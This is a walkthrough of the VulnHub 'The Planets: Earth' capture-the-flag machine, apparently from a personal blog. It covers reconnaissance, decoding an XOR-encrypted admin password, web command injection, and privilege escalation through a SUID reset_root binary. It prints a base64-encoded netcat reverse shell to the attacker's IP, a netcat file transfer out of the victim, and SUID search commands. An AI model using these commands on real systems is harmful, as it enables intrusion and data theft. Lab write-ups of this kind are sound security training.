The Planets: Earth VulnHub CTF Walkthrough
Earth is a intentionally vulnerable CTF machine which consists of two flags. The author of this machine is SirFlash and this machine belongs to the series called The Planets.
This machine can be downloaded from The Planets: Earth - VulnHub.
After downloading and setting up, it’ll look like this:
Also don’t forget to setup both the attacker and victim machine on the same network.
Then we’ve to fetch the IP address of the victim machine. It’s easy to find the IP address when the victim machine is in same network as ours. The command I used here is
sudo arp-scan -l
The next step is to do some recon on the IP address. We’ve to find open ports and services to collect more information. So the tool I’m gonna use is Nmap and the command is
nmap -sV -A -Pn 192.168.29.196
Here, we can see there are some open ports and I’m gonna concentrate on HTTP and HTTPS. So what I’m gonna do next is visit the IP address in the web browser.
The website says that this is a bad request. I guess there’s another way to open the website. So I checked the nmap report again and then I found that there’s DNS names to interact with the website. So I added the DNS names to /etc/hosts file.
Then again I tried to visit the website using the DNS names which are earth.local and terratest.earth.local.
Then I looked out for hidden directories or files in earth.local . For that, I used Dirsearch tool and the command I used is
dirsearch -u earth.local -w /usr/share/wordlists/dirb/big.txt
That’s how I found out the admin panel in the earth.local website. Then I visited the /admin page in the web browser.
I clicked Log In and it lead me to an admin login panel.
I don’t have the credentials to login. But I tried some default credentials and that wasn’t successful. Then I visited the terratest.earth.local.
So I thought why don’t I do some directory listing on the terratest.earth.local.
I found out that there’s a robots.txt file and I visited the file.
I guesssed this might be a TXT file and my guess was right. I confirmed it by visiting the testingnotes.txt in the web browser.
The contents inside the testingnotes.txt was useful. The testingnotes.txt was telling us that there’s a XOR encryption and also there’s a testdata.txt file inside the web server. Also, the username for admin portal is terra.
I tried to dictionary attack on username “terra” using rockyou.txt wordlist. But it wasn’t successful. That’s when I realized there’s another way to find the password.
So I visited the testdata.txt.
This information is crucial. Then I found out about the Cyber Chef.
One of these three hashes will help to find the password for admin user “terra”. The thing to do it
Import “From Hex” and “XOR” in Cyber Chef and input the XOR key same as in the testdata.txt. Put the hash into the Input and hit BAKE!. Hence we have the password earthclimatechangebad4humans.
Then I used the username terra and password earthclimatechangebad4humans to login.
And I was redirected to a page which has an input field and this input field processes Command Line Interface commands. So I tried some commands like whoami, ls, pwd etc.
I thought why shouldn’t I try to get a reverse shell. So I tried to inject a one line bash reverse shell payload. The command I tried were
But I failed to fetch reverse shell connection. So I tried to find the flag file using this input field and the command I used here were
locate flag
actually the word “flag” in “locate flag” was a guess and it worked hooray !!!
Then I read the flag using the command
cat /var/earth_web/user_flag.txt
So then I tried to read the root flag inside the root directory and I wasn’t allowed because of the low privileges. That’s when I thought I should get a reverse shell and I know I have already done it and it was failure. But this time, I’ll encode the reverse shell payload. Thought it might work.
So I created a netcat listener on my machine. The command were
nc -lnvp 53666
Then I encoded the reverse shell payload using Base64 encoder and the command I used here is
echo “nc -e /bin/ 192.168.29.167 53666” | base64
Then I injected the encoded reverse shell into the web server via the input field and the command I used here is
echo “bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjkuNjcgNTM2NjYK” | base64 -d | bash
Finally I got the reverse shell.
Then I tried to spawn a shell using a Python one line code.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Got a bash shell. Let’s redirect to root directory.
Nope. Privileges weren’t enough. We’ve to think about something else to escalate the privileges and get root access. So I had an idea to find
find / -perm -u=s -type f 2>/dev/null
The reset_root file might be helpful. So I tried to read the file because I wanted to know how this script works. I used the command
cat /usr/bin/reset_root
The whole data was encrypted and some of them were in another format. So I tried to execute the script.
I think this script might be trying to reset the root password and it failed due to some errors. Let’s find those error but I can’t do this here. So I’ll send it to my own machine. To do that, I have to start new netcat listener on my machine and send this file to my machine. So first lets start a netcat listener and the command I used here is
nc -lnvp 4444 > reset_root
The second step is to send the file into my machine. For that, I used
nc 192.168.29.67 4444 < /usr/bin/reset_root
The file has sent successfully. Lets check it in our listener.
I successfully received the reset_root file. Now we’ve to give the file executable permissions and the command I used here is
sudo chmod +x reset_root
The next step is to use the ltrace tool which can be installed using
sudo apt-get install ltrace
Lets do ltrace on the reset_root file
Here the script says, the root password can only be resetted until the three files/directories exist. So lets create these three files. I used mkdir command to create these directories.
All set. Now lets run the script.
The root password has been resetted to “Earth” successfully. The next thing to do here is to switch to the root account using the credentials
username “root” and password “Earth”.
Successfully accquired root access. Lets find the root flag. It might be lying around in the /root directory. So lets move to that directory and list the files inside that directory.
I got the root_flag.txt and I read it.
I successfully completed The Planets: Earth CTF challenge. Hooray !!!
